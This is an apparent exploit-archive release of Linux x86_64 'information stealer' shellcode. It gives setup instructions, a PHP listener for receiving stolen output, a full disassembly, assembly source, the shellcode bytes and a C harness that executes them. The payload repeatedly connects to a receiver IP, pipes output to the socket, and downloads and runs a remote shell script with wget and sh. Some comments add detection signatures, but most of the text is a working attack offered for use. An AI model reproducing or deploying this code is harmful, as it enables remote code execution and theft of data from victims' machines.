Linux/x86_64 - Information Stealer Shellcode
/*# Title : Linux x86_64 information stealer
# Date : 23-05-2016
# Author : Roziul Hasan Khan Shifat
# Tested On : Ubuntu 14.04 LTS x86_64
# Contact : shifath12@gmail.com
*/
/*
How this shellcode works
-----------------------------------
1. First it connects to the information receiver
2. then it downloads a sh script from http://192.168.30.129/pri.sh (server running on Kali linux)
3. then it duplicates stdout and stderr onto the socket descriptor
4. then it executes the script using sh
*/
/*
Note: the pri.sh file was on Kali linux; the server was Kali linux
client was Ubuntu
it downloads the pri.sh from kali linux
and Executes it on Ubuntu
*/
/*
Requirements of this shellcode
--------------------------------------
1.link of pri.sh (You can Found it on http://pastebin.com/V4gudKL5 ) . this script isn't mine.I've taken it from another.I customized the script
2.receiver ip
*/
/*
How to use this shellcode
---------------------------------
1. Upload the pri.sh any site
2. TO download the pri.sh , U need to Customize the wget procedure (I've marked where to customized)
3. Customize the connect procedure to connect to the receiver where I marked
4. U need to know assembly to completed 1,2 instruction
*/
/*
Receiver
---------
To receive the Information U may Use Netcat
If U want to view the information in a Web browser, I've a php script for U. Upload it to any site.
<?php
if (!($sock = socket_create(AF_INET, SOCK_STREAM, 0)))
{
$errorcode = socket_last_error();
$errormsg = socket_strerror($errorcode);
die ("Couldn't create socket: [$errorcode] $errormsg \n");}
echo "Socket created \n\n";
if ( !socket_bind($sock, "0.0.0.0" , 1532) )
{
$errorcode = socket_last_error();
$errormsg = socket_strerror($errorcode);
die ("Could not bind socket : [$errorcode] $errormsg \n");}
echo "Socket bind OK \n\n";
if (!socket_listen ($sock , 10))
{
$errorcode = socket_last_error();
$errormsg = socket_strerror($errorcode);
die ("Could not listen on socket : [$errorcode] $errormsg \n");}
echo "Socket listen OK \n\n\n";
echo "Waiting for incoming connections... \n";
//Accept incoming connection - This is a blocking call
$client = socket_accept($sock);
//display information about the client who is connected
if (socket_getpeername($client , $address , $port))
{
echo "Client $address : $port is now connected to us. \n";
}
//read data from the incoming socket
while(1)
{
$i= socket_recv($client,$buf, 1024000,MSG_WAITALL);
if($i<=0)
die("\nconnection closed by $address");
else
echo $buf."\n\n";
}
?>
if U use this script, the receiver ip will be the website ip
BUT I RECOMMEND U TO USE NETCAT
*/
/*
Disassembly of section .text:
0000000000400080 <_start>:
400080: 6a 06 pushq $0x6
400082: 6a 01 pushq $0x1
400084: 6a 02 pushq $0x2
400086: 5f pop %rdi
400087: 5e pop %rsi
400088: 5a pop %rdx
400089: 6a 29 pushq $0x29
40008b: 58 pop %rax
40008c: 0f 05 syscall
40008e: 48 31 db xor %rbx,%rbx
400091: 48 89 c3 mov %rax,%rbx
400094: 48 31 c0 xor %rax,%rax
400097: 48 31 ff xor %rdi,%rdi
40009a: b0 39 mov $0x39,%al
40009c: 0f 05 syscall
40009e: 4d 31 c9 xor %r9,%r9
4000a1: 4c 39 c8 cmp %r9,%rax
4000a4: 74 18 je 4000be <connect>
4000a6: 6a 3c pushq $0x3c
4000a8: 58 pop %rax
4000a9: 0f 05 syscall
00000000004000ab <retry>:
4000ab: 48 31 f6 xor %rsi,%rsi
4000ae: 48 f7 e6 mul %rsi
4000b1: 56 push %rsi
4000b2: 6a 3c pushq $0x3c
4000b4: 48 89 e7 mov %rsp,%rdi
4000b7: b0 23 mov $0x23,%al
4000b9: 0f 05 syscall
4000bb: eb 01 jmp 4000be <connect>
4000bd: c3 retq
00000000004000be <connect>:
4000be: 6a 10 pushq $0x10
4000c0: 5a pop %rdx
4000c1: 53 push %rbx
4000c2: 5f pop %rdi
4000c3: 48 31 c0 xor %rax,%rax
4000c6: 50 push %rax
4000c7: 50 push %rax
4000c8: 50 push %rax
4000c9: c6 04 24 02 movb $0x2,(%rsp)
4000cd: 66 c7 44 24 02 05 fc movw $0xfc05,0x2(%rsp)
4000d4: c7 44 24 04 c0 a8 1e movl $0x811ea8c0,0x4(%rsp)
4000db: 81
4000dc: 48 89 e6 mov %rsp,%rsi
4000df: b0 2a mov $0x2a,%al
4000e1: 0f 05 syscall
4000e3: 48 31 ff xor %rdi,%rdi
4000e6: 48 39 f8 cmp %rdi,%rax
4000e9: 7c c0 jl 4000ab <retry>
4000eb: 48 31 c0 xor %rax,%rax
4000ee: 48 31 f6 xor %rsi,%rsi
4000f1: 48 ff c6 inc %rsi
4000f4: 48 89 df mov %rbx,%rdi
4000f7: b0 21 mov $0x21,%al
4000f9: 0f 05 syscall
4000fb: 48 31 c0 xor %rax,%rax
4000fe: 48 ff c6 inc %rsi
400101: 48 89 df mov %rbx,%rdi
400104: b0 21 mov $0x21,%al
400106: 0f 05 syscall
400108: 48 31 c0 xor %rax,%rax
40010b: 48 83 c0 39 add $0x39,%rax
40010f: 0f 05 syscall
400111: 48 31 ff xor %rdi,%rdi
400114: 4d 31 e4 xor %r12,%r12
400117: 49 89 c4 mov %rax,%r12
40011a: 48 39 f8 cmp %rdi,%rax
40011d: 74 59 je 400178 <wget>
40011f: 4d 31 d2 xor %r10,%r10
400122: 48 31 d2 xor %rdx,%rdx
400125: 4c 89 d6 mov %r10,%rsi
400128: 4c 89 e7 mov %r12,%rdi
40012b: 48 31 c0 xor %rax,%rax
40012e: b0 3d mov $0x3d,%al
400130: 0f 05 syscall
400132: 48 31 c0 xor %rax,%rax
400135: 48 31 d2 xor %rdx,%rdx
400138: 50 push %rax
400139: 50 push %rax
40013a: c7 04 24 2f 2f 62 69 movl $0x69622f2f,(%rsp)
400141: c7 44 24 04 6e 2f 73 movl $0x68732f6e,0x4(%rsp)
400148: 68
400149: 48 89 e7 mov %rsp,%rdi
40014c: 50 push %rax
40014d: 50 push %rax
40014e: c7 04 24 2e 70 72 69 movl $0x6972702e,(%rsp)
400155: 66 c7 44 24 04 2e 73 movw $0x732e,0x4(%rsp)
40015c: c6 44 24 06 68 movb $0x68,0x6(%rsp)
400161: 48 89 e6 mov %rsp,%rsi
400164: 52 push %rdx
400165: 56 push %rsi
400166: 57 push %rdi
400167: 48 89 e6 mov %rsp,%rsi
40016a: 48 83 c0 3b add $0x3b,%rax
40016e: 0f 05 syscall
400170: 41 51 push %r9
400172: 5f pop %rdi
400173: 6a 03 pushq $0x3
400175: 58 pop %rax
400176: 0f 05 syscall
0000000000400178 <wget>:
400178: 48 31 c0 xor %rax,%rax
40017b: 50 push %rax
40017c: 50 push %rax
40017d: 50 push %rax
40017e: c7 04 24 2f 75 73 72 movl $0x7273752f,(%rsp)
400185: c7 44 24 04 2f 62 69 movl $0x6e69622f,0x4(%rsp)
40018c: 6e
40018d: c7 44 24 08 2f 2f 77 movl $0x67772f2f,0x8(%rsp)
400194: 67
400195: 66 c7 44 24 0c 65 74 movw $0x7465,0xc(%rsp)
40019c: 48 89 e7 mov %rsp,%rdi
40019f: 50 push %rax
4001a0: 50 push %rax
4001a1: 50 push %rax
4001a2: 50 push %rax
4001a3: c7 04 24 68 74 74 70 movl $0x70747468,(%rsp)
4001aa: c7 44 24 04 3a 2f 2f movl $0x312f2f3a,0x4(%rsp)
4001b1: 31
4001b2: c7 44 24 08 39 32 2e movl $0x312e3239,0x8(%rsp)
4001b9: 31
4001ba: c7 44 24 0c 36 38 2e movl $0x332e3836,0xc(%rsp)
4001c1: 33
4001c2: c7 44 24 10 30 2e 31 movl $0x32312e30,0x10(%rsp)
4001c9: 32
4001ca: c7 44 24 14 39 2f 70 movl $0x72702f39,0x14(%rsp)
4001d1: 72
4001d2: c7 44 24 18 69 2e 73 movl $0x68732e69,0x18(%rsp)
4001d9: 68
4001da: 48 89 e6 mov %rsp,%rsi
4001dd: 48 31 d2 xor %rdx,%rdx
4001e0: 50 push %rax
4001e1: 66 c7 04 24 2d 4f movw $0x4f2d,(%rsp)
4001e7: 48 89 e1 mov %rsp,%rcx
4001ea: 50 push %rax
4001eb: 50 push %rax
4001ec: c7 04 24 2e 70 72 69 movl $0x6972702e,(%rsp)
4001f3: 66 c7 44 24 04 2e 73 movw $0x732e,0x4(%rsp)
4001fa: c6 44 24 06 68 movb $0x68,0x6(%rsp)
4001ff: 49 89 e7 mov %rsp,%r15
400202: 52 push %rdx
400203: 41 57 push %r15
400205: 51 push %rcx
400206: 56 push %rsi
400207: 57 push %rdi
400208: 48 89 e6 mov %rsp,%rsi
40020b: b0 3b mov $0x3b,%al
40020d: 0f 05 syscall
*/
/*
section .text
global _start
;-----------------
_start:
;socket()
push 6
push 1
push 2
pop rdi
pop rsi
pop rdx
push 41
pop rax
syscall
;------------------
xor rbx,rbx
mov rbx,rax ;socket descriptor
;-------------
xor rax,rax
xor rdi,rdi
mov al,57
syscall
xor r9,r9
cmp rax,r9
jz connect
push byte 60
pop rax
syscall
retry:
xor rsi,rsi
mul rsi
push rsi
push byte 60 ;1 min ( change it if U want )
mov rdi,rsp
mov al,35
syscall
jmp connect
ret
connect:
;connect()
push 16
pop rdx
push rbx
pop rdi
xor rax,rax
push rax
push rax
push rax
mov ,byte 2
;-----------------------------------
;customize these statements
mov ,word 0xfc05 ;port 1532 ( U may change it, As U wish )
mov ,dword 0x811ea8c0 ;ip of reciver (must change it)
;--------------------------------------
mov rsi,rsp
mov al,42
syscall
xor rdi,rdi
cmp rax,rdi
jl retry
;------------dup2(sd,1)
xor rax,rax
xor rsi,rsi
inc rsi
mov rdi,rbx
mov al,33
syscall
;------------
;------------dup2(sd,2)
xor rax,rax
inc rsi
mov rdi,rbx
mov al,33
syscall
;------------
;fork()
xor rax,rax
add rax,57
syscall
xor rdi,rdi
xor r12,r12
mov r12,rax ;pid
cmp rax,rdi
jz wget
;---------------
;wait4()
xor r10,r10 ;null
xor rdx,rdx ;null
mov rsi,r10 ;status
mov rdi,r12 ;pid
xor rax,rax
mov al,61
syscall
;;
;-------------------------
;execve("//bin/sh",{"//bin/sh",".pri.sh",NULL},NULL);
xor rax,rax
xor rdx,rdx
push rax
push rax
mov ,dword '//bi'
mov ,dword 'n/sh'
mov rdi,rsp
push rax
push rax
mov ,dword '.pri'
mov ,word '.s'
mov ,byte 'h'
mov rsi,rsp
push rdx
push rsi
push rdi
mov rsi,rsp
add rax,59
syscall
;--------
;close(fd)
push r9
pop rdi
push 3
pop rax
syscall
wget:
;execve("/usr/bin//wget",{"/usr/bin//wget","http ://1 92.1 68.3 0.12 9/pr i.sh","-O",".pri.sh",NULL},NULL)
xor rax,rax
push rax
push rax
push rax
mov ,dword '/usr'
mov ,dword '/bin'
mov ,dword '//wg'
mov ,word 'et'
mov rdi,rsp
push rax
push rax
push rax
push rax
;----------------------
;customize these statements for the link of pri.sh
mov ,dword 'http'
mov ,dword '://1'
mov ,dword '92.1'
mov ,dword '68.3'
mov ,dword '0.12'
mov ,dword '9/pr'
mov ,dword 'i.sh'
;------------------------
mov rsi,rsp
xor rdx,rdx
push rax
mov ,word '-O'
mov rcx,rsp
push rax
push rax
mov ,dword '.pri'
mov ,word '.s'
mov ,byte 'h'
mov r15,rsp
push rdx
push r15
push rcx
push rsi
push rdi
mov rsi,rsp
mov al,59
syscall
*/
#include<stdio.h>
#include<string.h>
/*
 * Raw x86_64 payload bytes, matching the objdump listing and the assembly
 * above. Everything the payload needs is stored as immediate values, so the
 * following show up in cleartext both in this byte string and in the memory
 * of any process that stages it (useful hunting/detection signatures):
 *   - the sockaddr_in for the receiver: port 1532 (0xfc05) and the address
 *     bytes c0 a8 1e 81 (192.168.30.129) - see the "connect" section,
 *   - the argv strings "/usr/bin//wget", "http://192.168.30.129/pri.sh",
 *     "-O", ".pri.sh" and "//bin/sh".
 * Behaviour visible in the listing: a fork() whose parent exit()s so the child
 * keeps running detached; a connect() that, on failure, nanosleep()s for 60 s
 * and jumps back to connect() with no retry limit (persistent outbound
 * attempts to the receiver port); dup2() of fd 1 and fd 2 onto the socket
 * before the wget/sh execve()s, so all of their output goes to the receiver.
 */
char shellcode[]="\x6a\x06\x6a\x01\x6a\x02\x5f\x5e\x5a\x6a\x29\x58\x0f\x05\x48\x31\xdb\x48\x89\xc3\x48\x31\xc0\x48\x31\xff\xb0\x39\x0f\x05\x4d\x31\xc9\x4c\x39\xc8\x74\x18\x6a\x3c\x58\x0f\x05\x48\x31\xf6\x48\xf7\xe6\x56\x6a\x3c\x48\x89\xe7\xb0\x23\x0f\x05\xeb\x01\xc3\x6a\x10\x5a\x53\x5f\x48\x31\xc0\x50\x50\x50\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x05\xfc\xc7\x44\x24\x04\xc0\xa8\x1e\x81\x48\x89\xe6\xb0\x2a\x0f\x05\x48\x31\xff\x48\x39\xf8\x7c\xc0\x48\x31\xc0\x48\x31\xf6\x48\xff\xc6\x48\x89\xdf\xb0\x21\x0f\x05\x48\x31\xc0\x48\xff\xc6\x48\x89\xdf\xb0\x21\x0f\x05\x48\x31\xc0\x48\x83\xc0\x39\x0f\x05\x48\x31\xff\x4d\x31\xe4\x49\x89\xc4\x48\x39\xf8\x74\x59\x4d\x31\xd2\x48\x31\xd2\x4c\x89\xd6\x4c\x89\xe7\x48\x31\xc0\xb0\x3d\x0f\x05\x48\x31\xc0\x48\x31\xd2\x50\x50\xc7\x04\x24\x2f\x2f\x62\x69\xc7\x44\x24\x04\x6e\x2f\x73\x68\x48\x89\xe7\x50\x50\xc7\x04\x24\x2e\x70\x72\x69\x66\xc7\x44\x24\x04\x2e\x73\xc6\x44\x24\x06\x68\x48\x89\xe6\x52\x56\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05\x41\x51\x5f\x6a\x03\x58\x0f\x05\x48\x31\xc0\x50\x50\x50\xc7\x04\x24\x2f\x75\x73\x72\xc7\x44\x24\x04\x2f\x62\x69\x6e\xc7\x44\x24\x08\x2f\x2f\x77\x67\x66\xc7\x44\x24\x0c\x65\x74\x48\x89\xe7\x50\x50\x50\x50\xc7\x04\x24\x68\x74\x74\x70\xc7\x44\x24\x04\x3a\x2f\x2f\x31\xc7\x44\x24\x08\x39\x32\x2e\x31\xc7\x44\x24\x0c\x36\x38\x2e\x33\xc7\x44\x24\x10\x30\x2e\x31\x32\xc7\x44\x24\x14\x39\x2f\x70\x72\xc7\x44\x24\x18\x69\x2e\x73\x68\x48\x89\xe6\x48\x31\xd2\x50\x66\xc7\x04\x24\x2d\x4f\x48\x89\xe1\x50\x50\xc7\x04\x24\x2e\x70\x72\x69\x66\xc7\x44\x24\x04\x2e\x73\xc6\x44\x24\x06\x68\x49\x89\xe7\x52\x41\x57\x51\x56\x57\x48\x89\xe6\xb0\x3b\x0f\x05"; /* insert shellcode here */
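/*
 * Test harness: prints the payload length and then transfers control into
 * the byte array. strlen() stops at the first NUL, so the printed length is
 * only the full payload size while the array holds no 0x00 byte (the listing
 * above appears to contain none). The function-pointer cast relies on the
 * array's memory being executable; where the data segment is mapped
 * non-executable the call faults instead of running the payload.
 *
 * Returns 0 only if control ever comes back from the payload.
 */
int main(void)
{
	/* %lu matches the unsigned long the operand is cast to; %ld did not. */
	printf("shellcode length %lu\n", (unsigned long) strlen(shellcode));
	(*(int (*)(void)) shellcode)();
	return 0;
}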